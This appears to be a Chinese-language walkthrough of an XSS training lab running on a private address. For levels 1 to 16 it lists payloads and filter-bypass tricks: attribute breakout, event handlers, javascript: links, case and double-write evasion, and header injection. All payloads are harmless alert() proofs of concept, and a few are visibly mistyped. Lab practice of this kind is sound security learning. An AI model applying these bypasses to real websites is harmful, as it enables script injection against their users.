level 1
http://192.168.1.136:303/level1.php?name=<script>alert(/xss/)</script>
level 2
输入:http://192.168.1.136:303/level2.php?keyword=<a href="javascript:alert(/xss/)">test</a>
,发现出现">未闭合
查看源代码
重新闭合输入http://192.168.1.136:303/level2.php?keyword="><a href="javascript:alert(/xss/)">test</a>
level 3
输入测试代码<script "' Oonn>
发现 < 和 > 都被转义,这里考虑用javascript事件实现xss' onm ouseover='alert(/xss/)
level 4
同上" onm ouseover="alert(/xss/)
level 5
script 和 on都被加了下划线了,这里使用a标签绕过"><a href="javascript:alert(/xss/)">clickme!</a>
level 6
还是script和on加下划线,这次使用大小写绕过"><Script>alert(/xss/)</Script>
level 7
script 和 on 被直接过滤,可以采用双写绕过"><scscriptript>alert(/xss/)</scscriptript>
level 8
javascript:alert(/xss/)
进行Unicode编码javascript:alert(/xss/)
level 9
这里验证了http:// 字段,javascript:alert('http://')
level 10
发现源代码里面的t_sort 字段,可以进行注入http://192.168.1.136:303/level10.php?t_sort=click here!" onm ouseover=alert(/xss/) type="text"
level 11
referer注入:click" onm ouseover=alert(/xss/) type="text"
level 12
User-Agent: 1" onfocus=alert(/xss/) type="text"
level 13-15
搭建环境原因,无法测试
level 16
script、/、空格 都被替换成
这里考虑使用%0a替代空格keyword=<button%0avalue="click"%0aonclick=alert('xss')>
剩下的环境不支持,加载不出来,就没有继续做了